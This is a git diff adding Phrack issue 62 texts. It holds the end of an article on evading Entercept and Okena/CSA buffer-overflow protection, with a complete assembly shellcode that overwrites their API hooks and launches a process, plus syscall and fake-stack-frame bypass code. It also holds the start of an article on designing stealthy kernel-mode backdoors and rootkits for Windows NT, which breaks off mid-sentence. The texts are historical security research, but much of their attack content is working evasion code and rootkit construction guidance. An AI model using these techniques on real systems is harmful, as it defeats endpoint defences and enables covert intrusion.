+       WinExec() --> CreateProcessA() --> CreateProcessInternalA() 
+
+Okena/CSA and NAI Entercept hook both WinExec() and CreateProcessA()
+(see Appendix A and B). However, neither product hooks
+CreateProcessInternalA() (exported by kernel32.dll). When writing a
+shellcode, an attacker could find the export for
+CreateProcessInternalA() and use it instead of calling WinExec().
+
+CreateProcessA() pushes two NULLs onto the stack before calling
+CreateProcessInternalA(). Thus a shellcode only needs to push two NULLs
+and then call CreateProcessInternalA() directly to evade the userland
+API hooks of both products.
+
+As new DLLs and APIs are released, the complexity of Win32 API internal
+interactions increases, making the problem worse. Third party product
+vendors are at a severe disadvantage when implementing their buffer
+overflow detection technologies and are bound to make mistakes which
+can be exploited by attackers.
+
+
+----[ 4.2 - Fun With Trampolines
+
+Most Win32 API functions begin with a five byte preamble. First, EBP is
+pushed onto the stack, then ESP is moved into EBP.
+
+        [-----------------------------------------------------------]
+
+             Code Bytes          Assembly
+                  55             push ebp
+                  8bec           mov ebp, esp
+
+        [-----------------------------------------------------------]
+
+Both Okena/CSA and Entercept use inline function hooking. They overwrite
+the first 5 bytes of a function with an immediate unconditional jump or
+call. For example, this is what the first few bytes of WinExec() look like
+after NAI Entercept's hooks have been installed:
+
+        [-----------------------------------------------------------]
+
+               Code Bytes          Assembly
+                     e8 xx xx xx xx       call xxxxxxxx
+                     54                   push esp
+                     53                   push ebx
+                     56                   push esi
+                     57                   push edi
+
+        [-----------------------------------------------------------]
+
+Alternatively, the first few bytes could be overwritten with a jump
+instruction:
+
+        [-----------------------------------------------------------]
+
+               Code Bytes               Assembly
+                       e9 xx xx xx xx     jmp xxxxxxxx
+                       ...
+
+        [-----------------------------------------------------------]
+ 
+Obviously, it is easy for shellcode to test for these and other signatures
+before calling a function. If a hijacking mechanism is detected, the
+shellcode can use several different techniques to bypass the hook. 
+
+
+------[ 4.2.1 - Patch Table Jumping
+
+When an API is hooked, the original preamble is saved into a table so that
+the buffer overflow detector can recreate the original API after
+performing its validation checks. The preamble is stored in a patch table,
+which resides somewhere in the address space of an application. When
+shellcode detects the presence of an API hook, it can simply search for
+the patch table and make its calls to patch table entries. This
+completely avoids the hook, preventing the userland buffer overflow
+detector components from ever being in the attacker's call path.
+
+
+------[ 4.2.2 - Hook Hopping
+
+Alternatively, instead of locating the patch table, shellcode can include
+its own copy of the original pre-hook preamble. After executing its own
+API preamble, the shellcode can transfer execution to immediately after
+the API hook (function address plus five bytes).
+
+Since Intel x86 has variable length instructions, one must take this into
+account in order to land on an even instruction boundary:
+ 
+        [-----------------------------------------------------------]
+
+                Shellcode:
+                        call WinExecPreamble
+ 
+                WinExecPreamble:
+                        push ebp
+                        mov ebp, esp
+                        sub esp, 54
+                        jmp WinExec+6
+
+        [-----------------------------------------------------------]
+
+This technique will not work if another function within the call path
+is also hooked. In this case, Entercept also hooks CreateProcessA(),
+which WinExec() calls. Thus, to evade detection shellcode should call
+CreateProcessA() using the stored copy of CreateProcessA's preamble.
+
+
+----[ 4.3 - Repatching Win32 APIs
+
+Thoroughly hooking Win32 APIs is not effective when certain fundamental
+errors are made in the implementation of a userland buffer overflow
+detection component.
+
+Certain implementations (NAI Entercept) have a serious problem with the
+way they perform their API hooking. In order to be able to overwrite
+preambles of hooked functions, the code section for a DLL has to be made
+writable. Entercept marks code sections of kernel32.dll and ntdll.dll as
+writable in order to be able to modify their contents. However, Entercept
+never resets the writable bit!
+
+Due to this serious security flaw, it is possible for an attacker to
+overwrite the API hook by re-injecting the original preamble code. For
+the WinExec() and CreateProcessA() examples, this would require
+overwriting the first 6 bytes (just to be instruction aligned) of
+WinExec() and CreateProcessA() with the original preamble.
+
+        [-----------------------------------------------------------]
+                WinExecOverWrite:
+                     Code Bytes          Assembly
+                       55                push ebp
+                       8bec              mov ebp, esp
+                       83ec54            sub esp, 54
+
+                CreateProcessAOverWrite:
+                     Code Bytes          Assembly
+                       55                push ebp
+                       8bec              mov ebp, esp
+                       ff752c            push DWORD PTR [ebp+2c]
+        [-----------------------------------------------------------]
+
+This technique will not work against properly implemented buffer overflow
+detectors, however it is very effective against NAI Entercept. A complete
+shellcode example which overwrites the NAI Entercept hooks is presented
+below:
+
+        [-----------------------------------------------------------]
+
+              // This sample code overwrites the preamble of WinExec and
+              // CreateProcessA to avoid detection. The code then
+              // calls WinExec with a "calc.exe" parameter.
+              // The code demonstrates that by overwriting function
+              // preambles, it is able to evade Entercept and Okena/CSA
+              // buffer overflow protection.
+
+                _asm {
+                        pusha
+
+                        jmp JUMPSTART
+        START:
+                        pop ebp
+                        xor eax, eax
+                        mov al, 0x30
+                        mov eax, fs:[eax];
+                        mov eax, [eax+0xc];
+
+                        // We now have the module_item for ntdll.dll
+                        mov eax, [eax+0x1c]
+
+                        // We now have the module_item for kernel32.dll
+                        mov eax, [eax]
+
+                        // Image base of kernel32.dll
+                        mov eax, [eax+0x8]
+
+                        movzx ebx, word ptr [eax+3ch]
+
+                        // pe.oheader.directorydata[EXPORT=0]
+                        mov esi, [eax+ebx+78h]
+                        lea esi, [eax+esi+18h]
+
+                        // EBX now has the base module address
+                        mov ebx, eax
+                        lodsd
+
+                        // ECX now has the number of function names
+                        mov ecx, eax
+                        lodsd                        
+                        add eax,ebx
+
+                        // EDX has addresses of functions               
+                        mov edx,eax
+
+                        lodsd
+
+                        // EAX has address of names              
+                        add   eax,ebx
+
+                        // Save off the number of named functions
+			// for later
+                        push ecx
+
+                        // Save off the address of the functions
+                        push edx
+
+        RESETEXPORTNAMETABLE:
+                        xor edx, edx
+
+        INITSTRINGTABLE:
+                        mov esi, ebp // Beginning of string table
+                        inc esi
+
+        MOVETHROUGHTABLE:
+                        mov edi, [eax+edx*4]
+                        add edi, ebx // EBX has the process base address
+
+                        xor ecx, ecx
+                        mov cl, BYTE PTR [ebp]
+                        test cl, cl
+                        jz DONESTRINGSEARCH
+		
+
+        STRINGSEARCH:   // ESI points to the function string table
+                        repe cmpsb
+                        je Found
+
+                        // The number of named functions is on the stack
+                        cmp [esp+4], edx
+                        je NOTFOUND
+                        inc edx
+                        jmp INITSTRINGTABLE
+        Found:
+                        pop ecx
+                        shl edx, 2
+                        add edx, ecx
+                        mov edi, [edx]
+                        add edi, ebx
+                        push edi
+                        push ecx
+                        xor ecx, ecx
+                        mov cl, BYTE PTR [ebp]
+                        inc ecx
+                        add ebp, ecx
+                        jmp RESETEXPORTNAMETABLE
+
+        DONESTRINGSEARCH:
+        OverWriteCreateProcessA:
+                        pop edi
+                        pop edi
+                        push 0x06
+                        pop ecx
+                        inc esi
+                        rep movsb
+
+        OverWriteWinExec:
+                        pop edi
+                        push edi
+                        push 0x06
+                        pop ecx
+                        inc esi
+                        rep movsb
+
+        CallWinExec:
+                        push 0x03
+                        push esi
+                        call [esp+8]
+
+        NOTFOUND:
+                        pop edx
+        STRINGEXIT:
+                        pop ecx
+                        popa;
+                        jmp EXIT
+
+        JUMPSTART:
+                        add esp, 0x1000
+                        call START
+        WINEXEC:
+                        _emit 0x07
+                        _emit 'W'
+                        _emit 'i'
+                        _emit 'n'
+                        _emit 'E'
+                        _emit 'x'
+                        _emit 'e'
+                        _emit 'c'
+        CREATEPROCESSA:
+                        _emit 0x0e
+                        _emit 'C'
+                        _emit 'r'
+                        _emit 'e'
+                        _emit 'a'
+                        _emit 't'
+                        _emit 'e'
+                        _emit 'P'
+                        _emit 'r'
+                        _emit 'o'
+                        _emit 'c'
+                        _emit 'e'
+                        _emit 's'
+                        _emit 's'
+                        _emit 'A'
+        ENDOFTABLE:
+                        _emit 0x00
+
+        WinExecOverWrite:
+                        _emit 0x06
+                        _emit 0x55
+                        _emit 0x8b
+                        _emit 0xec
+                        _emit 0x83
+                        _emit 0xec
+                        _emit 0x54
+        CreateProcessAOverWrite:
+                        _emit 0x06
+                        _emit 0x55
+                        _emit 0x8b
+                        _emit 0xec
+                        _emit 0xff
+                        _emit 0x75
+                        _emit 0x2c
+        COMMAND:
+                        _emit 'c'
+                        _emit 'a'
+                        _emit 'l'
+                        _emit 'c'
+                        _emit '.'
+                        _emit 'e'
+                        _emit 'x'
+                        _emit 'e'
+                        _emit 0x00
+
+        EXIT:
+                        _emit 0x90
+
+                        // Normally call ExitThread or something here
+                        _emit 0x90
+                }
+
+        [-----------------------------------------------------------]
+
+
+----[ 4.4 - Attacking Userland Components
+
+While evading the hooks and techniques used by userland buffer overflow
+detector components is effective, there exist other mechanisms of
+bypassing the detection. Because both the shellcode and the buffer
+overflow detector are executing with the same privileges and in the same
+address space, it is possible for shellcode to directly attack the
+buffer overflow detector userland component.
+
+Essentially, when attacking the buffer overflow detector userland
+component the attacker is attempting to subvert the mechanism used to
+perform the shellcode detection check. There are only two principle
+techniques for shellcode validation checking. Either the data used for the
+check is determined dynamically during each hooked API call, or the data
+is gathered at process start up and then checked during each call.
+In either case, it is possible for an attacker to subvert the process.
+
+
+------[ 4.4.1 - IAT Patching
+
+Rather than implementing their own versions of memory page information
+functions, the commercial buffer overflow protection products simply use
+the operating system APIs. In Windows NT, these are implemented in
+ntdll.dll. These APIs will be imported into the userland component
+(itself a DLL) via its PE Import Table. An attacker can patch vectors
+within the import table to alter the location of an API to a function
+supplied by the shellcode. By supplying the function used to do the
+validation checking by the buffer overflow detector, it is trivial for
+an attacker to evade detection.
+
+
+------[ 4.4.2 - Data Section Patching
+
+For various reasons, a buffer overflow detector might use a pre-built
+list of page permissions within the address space. When this is the
+case, altering the address of the VirtualQuery() API is not effective.
+To subvert the buffer overflow detector, the shellcode has to locate and
+modify the data table used by the return address validation routines.
+This is a fairly straightforward, although application specific, technique
+for subverting buffer overflow prevention technologies.
+
+
+----[ 4.5 - Calling Syscalls Directly
+
+As mentioned above, rather than using ntdll.dll APIs to make system
+calls, it is possible for an attacker to create shellcode which makes
+system call directly. While this technique is very effective against
+userland components, it obviously cannot be used to bypass kernel based
+buffer overflow detectors. 
+
+To take advantage of this technique you must understand what parameters a
+kernel function uses. These may not always be the same as the parameters
+required by the kernel32 or ntdll API versions.
+
+Also, you must know the system call number of the function in question.
+You can find this dynamically using a technique similar to the one to find
+function addresses. Once you have the address of the ntdll.dll version of
+the function you want to call, index into the function one byte and read
+the following DWORD. This is the system call number in the system call
+table for the function. This is a common trick used by rootkit developers.
+
+Here is the pseudo code for calling NtReadFile system call directly:
+	
+	...
+	xor eax, eax
+	
+	// Optional Key
+	push eax        
+	// Optional pointer to large integer with the file offset
+	push eax	    	
+
+	push Length_of_Buffer
+	push Address_of_Buffer
+
+	// Before call make room for two DWORDs called the IoStatusBlock
+	push Address_of_IoStatusBlock 
+
+	// Optional ApcContext
+	push eax
+	// Optional ApcRoutine
+	push eax
+	// Optional Event
+	push eax
+
+	// Required file handle
+	push hFile
+
+	// EAX must contain the system call number
+	mov eax, Found_Sys_Call_Num
+
+	// EDX needs the address of the userland stack
+	lea edx, [esp]
+
+	// Trap into the kernel
+	// (recent Windows NT versions use "sysenter" instead)
+	int 2e
+
+
+----[ 4.6 - Faking Stack Frames
+
+As described in section 3.2, kernel based stack backtracing can be
+bypassed using fake frames. Same techniques works against userland based
+detectors.
+
+To bypass both userland and kernel backtracing, shellcode can create a
+fake stack frame without the ebp register on stack. Since stack
+backtracing relies on the presence of the ebp register to find the next
+stack frame, fake frames can stop backtracing code from tracing past
+the fake frame.
+
+Of course, generating a fake stack frame is not going to work when the
+EIP register still points to shellcode which resides in a writable
+memory segment. To bypass the protection code, shellcode needs to use
+an address that lies in a non-writable memory segment. This presents
+a problem since shellcode needs a way to eventually regain control of
+the execution.
+
+The trick to regaining control is to proxy the return to shellcode
+through a "ret" instruction which resides in a non-writable memory
+segment. "ret" instruction can be found dynamically by searching memory
+for a 0xC3 opcode.
+
+Here is an illustration of a normal LoadLibrary("kernel32.dll") call
+that originates from a writable memory segment:
+
+
+	push	kernel32_string
+	call	LoadLibrary
+
+	return_eip:
+
+
+	.
+	.
+	.
+
+	LoadLibrary:	; * see below for a stack illustration
+
+	.
+	.
+	.
+	ret		; return to stack-based return_eip
+
+
+
+	|------------------------------|
+	| address of "kernel32.dll" str|
+	|------------------------------|
+	| return address (return_eip)  |
+	|------------------------------|
+
+
+As explained before, the buffer overflow protection code executes before
+LoadLibrary gets to run. Since the return address (return_eip) is in a
+writable memory segment, the protection code logs the overflow
+and terminates the process.
+
+Next example illustrates 'proxy through a "ret" instruction' technique:
+
+
+	push	return_eip
+	push	kernel32_string
+
+	; fake "call LoadLibrary" call
+	push	address_of_ret_instruction
+	jmp	LoadLibrary
+
+	return_eip:
+
+
+	.
+	.
+	.
+
+	LoadLibrary:	; * see below for a stack illustration
+
+	.
+	.
+	.
+	ret		; return to non stack-based address_of_ret_instruction
+
+
+
+
+	address_of_ret_instruction:
+
+	.
+	.
+	.
+	ret		; return to stack-based return_eip
+
+
+
+Once again, the buffer overflow protection code executes before
+LoadLibrary gets to run. This time though, the stack is setup with a
+return address pointing to a non-writable memory segment. In addition,
+the ebp register is not present on stack thus the protection code cannot
+perform stack backtracing and determine that the return address in the
+next stack frame points to a writable segment. This allows the shellcode
+to call LoadLibrary which returns to the "ret" instruction. In its turn,
+the "ret" instruction pops the next return address off stack
+(return_eip) and transfers control to it.
+
+
+	|------------------------------|
+	| return address (return_eip)  |
+	|------------------------------|
+	| address of "kernel32.dll" str|
+	|------------------------------|
+	| address of "ret" instruction |
+	|------------------------------|
+
+
+In addition, any number of arbitrary complex fake stack frames can be
+setup to further confuse the protection code.
+
+Here is an example of a fake frame that uses a "ret 8" instruction
+instead of simple "ret":
+
+
+	|--------------------------------|
+	|          return address        |
+	|--------------------------------|
+	|  address of "ret" instruction  |	<- fake frame 2
+	|--------------------------------|
+	|         any value		 |
+	|--------------------------------|
+	| address of "kernel32.dll" str  |
+	|--------------------------------|
+	| address of "ret 8" instruction |	<- fake frame 1
+	|--------------------------------|
+
+
+This causes an extra 32-bit value to be removed from stack, complicating
+any kind of analysis even further.
+
+
+--[ 5 - Conclusions
+
+The majority of commercial security systems do not actually prevent
+buffer overflows but rather detect the execution of shellcode. The most
+common technology used to detect shellcode is code page permission
+checking which relies on stack backtracing.
+
+Stack backtracing involves traversing stack frames and verifying that
+the return addresses do not originate from writable memory segments such
+as stack or heap areas.
+
+The paper presents a number of different ways to bypass both userland
+and kernel based stack backtracing. These range from tampering with
+function preambles to creating fake stack frames.
+
+In conclusion, the majority of current buffer overflow protection
+implementations are flawed, providing a false sense of security and
+little real protection against determined attackers. 
+
+
+
+
+Appendix A: Entercept 4.1 Hooks
+
+
+Entercept hooks a number of functions in userland and in the kernel. Here
+is a list of the currently hooked functions as of Entercept 4.1.
+
+User Land
+     msvcrt.dll
+          _creat
+          _read
+          _write
+          system
+     kernel32.dll
+          CreatePipe
+          CreateProcessA
+          GetProcAddress
+          GetStartupInfoA
+          LoadLibraryA
+          PeekNamedPipe
+          ReadFile
+          VirtualProtect
+          VirtualProtectEx
+          WinExec
+          WriteFile
+     advapi32.dll
+          RegOpenKeyA
+     rpcrt4.dll
+          NdrServerInitializeMarshall
+     user32.dll
+          ExitWindowsEx
+     ws2_32.dll
+          WPUCompleteOverlappedRequest
+          WSAAddressToStringA
+          WSACancelAsyncRequest
+          WSACloseEvent
+          WSAConnect
+          WSACreateEvent
+          WSADuplicateSocketA
+          WSAEnumNetworkEvents
+          WSAEventSelect
+          WSAGetServiceClassInfoA
+          WSCInstallNameSpace
+     wininet.dll
+          InternetSecurityProtocolToStringW
+          InternetSetCookieA
+          InternetSetOptionExA
+     lsasrv.dll
+          LsarLookupNames
+          LsarLookupSids2
+     msv1_0.dll
+          Msv1_0ExportSubAuthenticationRoutine
+          Msv1_0SubAuthenticationPresent
+
+Kernel
+     NtConnectPort
+     NtCreateProcess
+     NtCreateThread
+     NtCreateToken
+     NtCreateKey
+     NtDeleteKey
+     NtDeleteValueKey
+     NtEnumerateKey
+     NtEnumerateValueKey
+     NtLoadKey
+     NtLoadKey2
+     NtQueryKey
+     NtQueryMultipleValueKey
+     NtQueryValueKey
+     NtReplaceKey
+     NtRestoreKey
+     NtSetValueKey
+     NtMakeTemporaryObject
+     NtSetContextThread
+     NtSetInformationProcess
+     NtSetSecurityObject
+     NtTerminateProcess
+
+
+
+Appendix B: Okena/Cisco CSA 3.2 Hooks
+
+
+Okena/CSA hooks many functions in userland but many less in the kernel.
+A lot of the userland hooks are the same ones that Entercept hooks.
+However, almost all of the functions Okena/CSA hooks in the kernel are
+related to altering keys in the Windows registry. Okena/CSA does not
+seem as concerned as Entercept about backtracing calls in the kernel.
+This leads to an interesting vulnerability, left as an exercise to the
+reader.
+
+User Land
+     kernel32.dll
+          CreateProcessA
+          CreateProcessW
+          CreateRemoteThread
+          CreateThread
+          FreeLibrary
+          LoadLibraryA
+          LoadLibraryExA
+          LoadLibraryExW
+          LoadLibraryW
+          LoadModule
+          OpenProcess
+          VirtualProtect
+          VirtualProtectEx
+          WinExec
+          WriteProcessMemory
+    ole32.dll
+          CoFileTimeToDosDateTime
+          CoGetMalloc
+          CoGetStandardMarshal
+          CoGetState
+          CoResumeClassObjects
+          CreateObjrefMoniker
+          CreateStreamOnHGlobal
+          DllGetClassObject
+          StgSetTimes
+          StringFromCLSID
+     oleaut32.dll
+          LPSAFEARRAY_UserUnmarshal
+     urlmon.dll
+          CoInstall
+
+Kernel  
+     NtCreateKey
+     NtOpenKey
+     NtDeleteKey
+     NtDeleteValueKey
+     NtSetValueKey
+     NtOpenProcess
+     NtWriteVirtualMemory     
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack62/6.txt b/phrack62/6.txt
new file mode 100644
index 0000000..4a296ce
--- /dev/null
+++ b/phrack62/6.txt
@@ -0,0 +1,3475 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3e, Phile #0x06 of 0x10
+
+
+|=---------------=[ Kernel-mode backdoors for Windows NT ]=--------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------=[ firew0rker <firew0rker@nteam.ru> ]=----------------=|
+|=----------------=[ the nobodies <http://www.nteam.ru> ]=---------------=|
+
+--[ Table of contents
+
+  1 - PREFACE
+
+  2 - OVERVIEW OF EXISTING KERNEL-MODE BACKDOORS FOR WINDOWS NT
+    2.1 - NTROOTKIT
+    2.2 - HE4HOOK
+    2.3 - SLANRET (IERK, BACKDOOR-ALI)
+
+  3 - OBSCURITY ON DISK, IN REGISTRY AND IN MEMORY
+
+  4 - MY VARIANT: THORNY PATH
+    4.1 - SHELL
+    4.2 - ACTIVATION AND COMMUNICATION WITH REMOTE CLIENT
+    4.3 - OBSCURITY ON DISK
+
+  5 - CONCLUSION
+  6 - EPILOGUE
+  7 - LIST OF USED SOURCES
+  8 - FILES
+
+--[ 1 - Preface
+
+    This article is intended for those who know the architecture of the 
+Windows NT kernel and the principles of operation of NT drivers. This
+article examines issues involved in the development of kernel-mode tools 
+for stealthy remote administration of Windows NT.
+
+    Recently there has been a tendency of extending the use of Windows NT
+(2000, XP, 2003) from it's classical stronghold as home and 
+office OS to servers. At the same time, the outdated Windows 9x family is 
+replaced by the NT family. Because of this it should be evident that remote
+administration tools (backdoors) and unnoticeable access tools (rootkits)
+for the NT family have a certain value. Most of the published utilities 
+work in user-mode and can thus be detected by Antivirus tools or by manual
+inspection.
+
+    It's quite another matter those works in kernel-mode: They can hide 
+from any user-mode program. Antivirus software will have to suplly kernel-
+mode components in order to detect a kernel-mode-backdoor. Software exists
+that protects against such backdoors (such as IPD, "Integrity Protection
+Driver"), but it's use is not widely spread. Kernel mode backdoors are not
+as widely used as they could be due to their relative complexity in comp-
+arison with user-mode backdoors.
+
+--[ 2 - Overview of existing Kernel-Mode backdoors for Windows NT
+
+    This section briefly reviews existing kernel-mode backdoors for Windows
+    NT.
+    
+----[ 2.1 - Ntrootkit
+    
+    Ntrootkit (c) by Greg Hoglund and a team of free developers [1] is a 
+device driver for Windows NT 4.0 and 2000. It's possibilities (implemented
+and potential):
+
+ - Receiving commands from a remote client. The rk_packet module contains
+   a simplified IP-stack, which uses free IP-address from the subnet where
+   the host on which Ntrootkit has been installed is situated.
+
+   It's MAC and IP addresses are hardcoded in the source. Connection with 
+   the rootkit at that IP is carried out via a TCP connection to any port. 
+   The available commands in rk_command.c are:
+
+       ps - list processes
+       help - self explainatory
+       buffertest, echo and debugint - for debugging purpose
+       hidedir - hide directory/file
+       hideproc - hide process(es)
+       sniffkeys - keyboard spy
+
+   There are also imcomplete pieces of code: Execute commands received via
+   a covert channel and starting a Win32-process from a driver (a hard and
+   complicated task).
+
+ - Encrypt all traffic using Schneier's Blowfish algorithm:
+   rk_blowfish.c is present, but not (yet ?) used
+
+ - Self-defense (rk_defense.c) - hide protected objects (in this
+   case: registry keys), identified by the string "_root_"; redirect
+   launched processes.
+
+   The hiding of processes, directories and files as implemented in 
+   rk_ioman.c is done through hooking the following functions: 
+   
+       NtCreateFile
+       ZwOpenFile
+       ZwQueryDirectoryFile
+       ZwOpenKey
+       ZwQueryKey
+       ZwQueryValueKey
+       ZwEnumerateValueKey
+       ZwEnumerateKey
+       ZwSetValueKey
+       ZwCreateKey
+
+   The way to detect this rootkit:
+
+   Make direct request to filesystem driver, send IRP to it. There is
+   one more module that hooks file handling: rk_files.c, adopted from
+   filemon, but it is not used.
+
+ - Starting processes: An unfinished implementation of it can be found
+   in rk_command.c, another one (which is almost complete and good) is 
+   in rk_exec.c
+
+   The implementation suffers from the fact that Zw* functions which are
+   normally unavailable to drivers directly are called through the system
+   call interface (int 0x2E), leading to problems with different versions
+   of the NT family as system call numbers change.
+
+    It seems like the work on Ntrootkit is very loosely coordinated: every
+    developer does what (s)he considers needed or urgent. Ntrootkit does 
+    not achieve complete (or sufficient) invisibility. It creates device 
+    named "Ntroot", visible from User-Mode.
+
+    When using Ntrootkit for anything practical, one will need some means
+of interaction with the rootkitted system. Shortly: There will be the
+need for some sort of shell. Ntrootkit itself can not give out a shell
+directly, although it can start a process -- the downside is that the
+I/O of that process can not be redirected. One is thus forced to start
+something like netcat. It's process can be hidden, but it's TCP-connection
+will be visible. The missing redirection of I/O is a big drawback.
+    
+    However, Ntrootkit development is still in progress, and it will 
+probably become a fully-functional tool for complete and stealthy remote 
+administration.
+
+----[ 2.2 - He4Hook
+
+    This description is based on [2]. The filesystem access was hooked via
+two different methods in the versions up to and including 2.15b6. Only one
+of it works at one time, and in versions after 2.15b6 the first method was
+removed.
+
+Method A: hook kernel syscalls:
+===============================
+
+ZwCreateFile, ZwOpenFile      - driver version 1.12 and from 1.17 to 
+                                2.15beta6
+IoCreateFile                  - from 1.13 to 2.15beta6
+ZwQueryDirectoryFile, ZwClose - before 2.15beta6
+
+Almost all these exported functions (Zw*) have the following function
+body:
+  mov eax, NumberFunction
+  lea edx, [esp+04h]
+  int 2eh                       ; Syscall interface
+
+    The "NumberFunction" is the number of the called function in the 
+syscalls table (which itself can be accessed via the global variable
+KeServiceDescriptorTable). This variable points to following structure:
+
+typedef struct SystemServiceDescriptorTable
+  {
+    SSD  SystemServiceDescriptors[4];
+  } SSDT, *LPSSDT;
+
+Other structures:
+
+typedef VOID *SSTAT[];
+typedef unsigned char SSTPT[];
+typedef SSTAT *LPSSTAT;
+typedef SSTPT *LPSSTPT;
+
+typedef struct SystemServiceDescriptor
+  {
+    LPSSTAT lpSystemServiceTableAddressTable;
+    ULONG  dwFirstServiceIndex;
+    ULONG  dwSystemServiceTableNumEntries;
+    LPSSTPT lpSystemServiceTableParameterTable;
+  } SSD, *LPSSD;
+
+The DescriptorTable pointed to by KeServiceDescriptorTable is only
+accessible from kernel mode. In User-Mode, there is something called
+KeServiceDescriptorTableShadow -- unfortunately it is not exported.
+
+Base services are in
+
+ KeServiceDescriptorTable->SystemServiceDescriptors[0]
+ KeServiceDescriptorTableShadow->SystemServiceDescriptors[0]
+
+KernelMode GUI services are in
+ KeServiceDescriptorTableShadow->SystemServiceDescriptors[1]
+
+    Other elements of that tables were free at moment when [2] was
+written, in all versions up to WinNt4(SP3-6) and Win2k build 2195.
+Each element of the table is a SSID structure, which contains the 
+following data:
+
+lpSystemServiceTableAddressTable   - A pointer to an array of addresses
+                                     of functions that will be called if
+                                     a matching syscall is called
+                                     
+dwFirstServiceIndex                - Start index for the first function
+
+dwSystemServiceTableNumEntries     - Number of services in table
+
+lpSystemServiceTableParameterTable - An array of bytes specifying the
+                                     number of bytes from the stack that
+                                     will be passed through
+
+In order to hook a system call, He4HookInv replaces the address stored in
+KeServiceDescriptorTable->SystemServiceDescriptos[0].lpSystemServiceTableAddressTableIn
+with a pointer to it's own table.
+
+One can interface with He4HookInv by adding your own services to the
+system call tables. He4HookInv updates both tables:
+
+- KeServiceDescriptorTable
+- KeServiceDescriptorTableShadow.
+
+Otherwise, if it updated only KeServiceDescriptorTable, new services 
+would be unavailable from UserMode. To locate KeServiceDescriptorTable-
+Shadow the following technique is used:
+
+    The function KeAddSystemServiceTable can be used to add services to the
+kernel. It can add services to both tables. Taking into account that its
+0-th descriptor is identical, it's possible, by scanning
+KeAddSystemServiceTable function's code, to find the address of the shadow
+table. You can see how it is done in file He4HookInv.c, function 
+FindShadowTable(void).
+
+    If this method fails for some reason, a hardcoded address is taken
+(KeServiceDescriptorTable-0x230) as location of the shadow table. This 
+address has not changed since WinNT Sp3. Another problem is the search
+for the correct index into the function address array. As almost all Zw*
+functions have an identical first instruction (mov eax, NumberFunction),
+one can get a pointer to the function number easily by adding one byte
+to the address exported by ntoskrnl.exe
+
+Method B: (for driver versions 2.11 and higher)
+===============================================
+
+    The callback tables located in the DRIVER_OBJECT of the file system
+drivers are patched: The IRP handlers of the needed drivers are replaced.
+This includes replacing the pointers to base function handlers 
+(DRIVER_OBJECT->MajorFunction) as well as replacing pointers to the
+drivers unload procedure (DRIVER_OBJECT->DriverUnload).
+
+The following functions are handled:
+
+IRP_MJ_CREATE
+IRP_MJ_CREATE_NAMED_PIPE
+IRP_MJ_CREATE_MAILSLOT
+IRP_MJ_DIRECTORY_CONTROL -> IRP_MN_QUERY_DIRECTORY
+
+For a more detailed description of the redirection of file operations
+refer to the source [2].
+
+----[ 2.3 - Slanret (IERK, Backdoor-ALI)
+
+    The source code for this is unavailable -- it was originally disco-
+vered by some administrator on his network. It is a normal driver 
+("ierk8243.sys") which periodically causes BSODs, and is visible as a
+service called "Virtual Memory Manager".
+
+        "Slanret is technically just one component of a
+         root kit. It comes with a straightforward backdoor
+         program: a 27 kilobyte server called "Krei" that
+         listens on an open port and grants the hacker remote
+         access to the system. The Slanret component is a
+         seven kilobyte cloaking routine that burrows into the
+         system as a device driver, then accepts commands from
+         the server instructing it on what files or processes
+         to conceal." [3]
+
+----[ 3. Stealth on disk, in registry and in memory
+
+    The lower the I/O interception in a rootkit is performed, the harder
+it usually is to detect it's presence. One would think that a reliable 
+place for interception would be the low-level disk operations (read/write
+sectors). This would require handling all filesystems that might be on 
+the hard disk though: FAT16, FAT32, NTFS.
+
+    While FAT was relatively easy to deal with (and some old DOS stealth
+viruses used similar techniques) an implementation of something similar
+on WinNT is a task for maniacs.
+
+    A second place to hook would be hooking dispatch functions of file-
+system drivers: Patch DriverObject->MajorFunction and FastIoDispatch in
+memory or patch the drivers on disk. This has the advantage of being re-
+latively universal and is the method used in HE4HookInv.
+
+    A third possibility is setting a filter on a filesyste driver (FSD).
+This has no advantages in comparison with the previous method, but has 
+the drawback of being more visible (Filemon uses this approach). The
+functions Zw*, Io* can then be hooked either by manipulating the Ke-
+ServiceDescriptorTable or directly patching the function body. It is
+usually quite easy to detect that pointers in KeServiceDescriptorTable
+point to strange locations or that the function body of a function has
+changed. A filter driver is also easy to detect by calling IoGetDevice-
+ObjectPointer and then checking DEVICE_OBJECT->StackSize.
+
+    All normal drivers have their own keys in the registry, namely in
+HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.
+
+    The abovementioned rootkits can hide registry keys, but obviously,
+if the system is booted "cleanly", an administrator can see anything that
+was hidden. One can also load a rootkit using ZwSetSystemInformation(
+SystemLoadAndCallimage) without the need to create any registry keys. An
+example of this technique can be found in [6].
+
+    A rootkit loader in a separate file is too unstealthy. It might be a
+smarter move to patch that call into some executable file which is part of
+the system boot. One can use any driver or user-mode program that works 
+with sufficient privileges, or any DLL linked to by it. One has to ask one
+question though: If the newly introduced changes need to be hidden anyway,
+why make two similar but differing procedures (for hiding changes to a
+file as well as hiding the existance of a file) instead of limiting our-
+selves to one ?
+
+    In most cases one can target null.sys. Implementing it's functionality
+is as easy as "hello world", and that is why it is usually replaced with a 
+trojan. But if we are going to have a procedure for hiding changes to a
+file, we can replace ANY driver with a trojan that will substitute the 
+content of the replaced file with the original content to everyone (incl-
+uding the kernel). Upon startup, it will copy itself to some allocated 
+memory area and start a thread there. 
+
+    This will make the trojan almost unnoticeable in memory: No system 
+utility can see the driver any more, as it is just an anonymous memory
+page amongst many. We do not even need a thread, using intercepted IRP 
+dispatch functions of some driver (DriverObject->MajorFunction[IRP_MJ_xxx]).
+We can also use IoQueueWorkItem and KeInsertQueueDpc, so no additional
+threads in SYSTEM will be visible in the task manager. After this is done
+the trojan can unload the driver it was started from, and reload it in a
+clean (unchanged) variant. As a result, high levels of stealth will be 
+achieved by relatively simple means. The original content of the manipu-
+lated file could for example be stored in the trojan's file after the
+trojan itself.
+
+    It will then be sufficient to hook all FSD requests (IRP and FastIO)
+and upon access change the position (and size of the file).
+(CurrentIrpStackLocation->Parameters.*.ByteOffset)
+    
+--[ 4 - My variant: The thorny path
+
+----[ 4.1 - Shell
+
+    I originally intended to do something similarily simple as standard
+user-mode code: Just pass a socket handle for stdin/stdout/stderr to the
+newly created cmd.exe process. I did not find a way to open a useful 
+socket from a driver though, as the interface with the AFD driver (kmode
+core of winsock) is undocumented. Reverse-engineering it's usage was not
